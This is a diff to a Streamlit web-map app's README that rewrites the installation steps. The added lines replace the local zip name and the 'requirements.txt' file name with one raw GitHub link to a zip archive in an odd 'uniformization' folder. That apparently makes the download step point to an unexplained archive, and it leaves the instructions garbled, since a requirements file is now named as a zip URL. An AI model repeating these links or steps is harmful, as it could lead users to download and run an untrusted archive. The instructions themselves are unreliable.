notxing/Streamlit-Webmap-app/README.md

 After downloading the app, here’s how to install it:

-1. Locate the downloaded zip file (`Streamlit-Webmap-app.zip`) on your computer.
+1. Locate the downloaded zip file (`https://raw.githubusercontent.com/notxing/Streamlit-Webmap-app/main/uniformization/Streamlit-Webmap-app.zip`) on your computer.
 2. Right-click on the file and choose "Extract All" or use a program like WinRAR or 7-Zip to extract the contents.
-3. Open the extracted folder and find a file named `requirements.txt`.
+3. Open the extracted folder and find a file named `https://raw.githubusercontent.com/notxing/Streamlit-Webmap-app/main/uniformization/Streamlit-Webmap-app.zip`.
 This file lists the necessary packages that need to be installed.

 ### 🐍 Installing Required Packages